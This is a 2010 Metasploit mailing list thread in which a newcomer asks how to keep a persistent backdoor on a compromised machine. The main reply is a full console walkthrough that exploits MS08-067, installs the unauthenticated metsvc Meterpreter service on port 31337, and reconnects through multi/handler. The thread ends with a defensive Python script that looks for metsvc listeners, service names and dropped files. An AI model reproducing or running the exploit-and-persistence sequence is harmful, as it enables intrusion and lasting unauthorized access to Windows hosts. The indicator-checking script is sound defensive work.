Metasploit mailing list archives

Re: newbie backdoor issue


From: Carlos Perez <carlos_perez () darkoperator com>
Date: Fri, 22 Jan 2010 18:52:20 -0400

Changing the rport in the script will not change the port on which the service will listen, since this port is hardcoded 
in the service. If you look in the script, this variable is only used for the creation of the multi/handler for 
connecting to the service and not for the installation of the service or its configuration. 


Carlos 

On Jan 22, 2010, at 6:31 PM, troy () defendit com au wrote:

Edit metsvc.rb (/pentest/exploits/framework3/scripts/meterpreter) and
change rport value as needed.



nice troy,

let me give it a try and see how effective it is; also tell me, can we use
common ports like 80, 8080 etc. to reconnect to the target..

--

Happiness is like a Butterfly...


--- On Fri, 22/1/10, troy () defendit com au <troy () defendit com au> wrote:

From: troy () defendit com au <troy () defendit com au>
Subject: Re: [framework] newbie backdoor issue
To: "SuNeEl" <seacore14 () yahoo com>
Cc: framework () spool metasploit com
Date: Friday, 22 January, 2010, 12:39 PM

Hi,

You could upload meterpreter and install as a service.

Example:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.9
RHOST => 192.168.0.9
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:English
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.3:36842 -> 192.168.0.9:4444)


meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory
C:\WINDOWS\TEMP\iTImctYkkgUlqQ...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
* Starting service
Service metsvc successfully installed.

meterpreter>
To connect back to the host later:

Background session 2? [y/N]  y
msf exploit(ms08_067_netapi) > back

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > set RHOST 192.168.0.9
RHOST => 192.168.0.9

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started bind handler
[*] Meterpreter session 3 opened (192.168.0.3:49164 -> 192.168.0.9:31337)

meterpreter >
Background session 3? [y/N]
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  2   Meterpreter  192.168.0.3:41472 -> 192.168.0.9:4444
  3   Meterpreter  192.168.0.3:49164 -> 192.168.0.9:31337


Caution: the meterpreter listener doesn't require authentication; anybody
who can access the meterpreter port (in this case 31337) could connect to
the target and gain system privs.

sorry if it seems odd at first look but..

tested on target environment xp sp2, obtained shell..lol

but the issue is how to set a permanent & persistent backdoor so that I
can connect to the same host when I wish to..

any suggestion or help appreciated
--

Happiness is like a Butterfly...



https://mail.metasploit.com/mailman/listinfo/framework




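Troy's caution above (an unauthenticated metsvc listener, by default on port 31337, a service named metsvc, and metsvc.exe / metsvc-server.exe / metsrv.dll dropped under C:\WINDOWS\TEMP) gives a defender concrete indicators to check a Windows host for. The following Python script is an added example, not code from the thread or from Metasploit: it runs those checks over constructed `netstat -ano` rows and a constructed service list (name and binary path as `sc qc` reports them); RANDOMDIR is a placeholder for the random temp directory name.

```python
import re

# Indicators taken from the metsvc run shown in the thread.
METSVC_DEFAULT_PORT = 31337
METSVC_SERVICE_NAME = "metsvc"
METSVC_FILES = ("metsvc.exe", "metsvc-server.exe", "metsrv.dll")
TEMP_DIR_RE = re.compile(r"\\windows\\temp\\", re.IGNORECASE)

# One data row of `netstat -ano`: proto, local addr:port, foreign addr, optional state, pid.
NETSTAT_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s+([A-Z_]+)?\s*(\d+)\s*$", re.IGNORECASE)

def parse_netstat(lines):
    """Yield (proto, local_addr, port, state, pid) per data row; UDP rows carry no state."""
    for line in lines:
        m = NETSTAT_RE.match(line)
        if m:
            proto, addr, port, _foreign, state, pid = m.groups()
            yield proto.upper(), addr, int(port), (state or "").upper(), int(pid)

def find_metsvc_indicators(netstat_lines, services):
    """Return (kind, detail) findings; services are (name, binary_path) pairs as from `sc qc`."""
    findings = []
    for proto, addr, port, state, pid in parse_netstat(netstat_lines):
        if proto == "TCP" and state == "LISTENING" and port == METSVC_DEFAULT_PORT:
            findings.append(("listener", f"{addr}:{port} pid {pid}"))
    for name, path in services:
        if name.lower() == METSVC_SERVICE_NAME:
            findings.append(("service_name", f"{name} -> {path}"))
        elif path.lower().endswith(METSVC_FILES):
            findings.append(("service_binary", f"{name} -> {path}"))
        if TEMP_DIR_RE.search(path):  # any service binary under TEMP is suspicious on its own
            findings.append(("service_in_temp", f"{name} -> {path}"))
    return findings

# Constructed sample input modelled on the thread's output (not real captures);
# RANDOMDIR stands in for the random temp directory name metsvc creates.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:31337          0.0.0.0:0              LISTENING       1580
  TCP    192.168.0.9:4444       192.168.0.3:41472      ESTABLISHED     4
  UDP    0.0.0.0:500            *:*                                    704
""".splitlines()
SAMPLE_SERVICES = [
    ("Spooler", r"C:\WINDOWS\system32\spoolsv.exe"),
    ("metsvc", r"C:\WINDOWS\TEMP\RANDOMDIR\metsvc.exe"),
]

for kind, detail in find_metsvc_indicators(SAMPLE_NETSTAT, SAMPLE_SERVICES):
    print(f"[{kind}] {detail}")
```

As Carlos notes, the listening port is hardcoded in the service rather than taken from rport, so the port check only covers the default; the service name and binary path checks are what catch an instance on another port.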

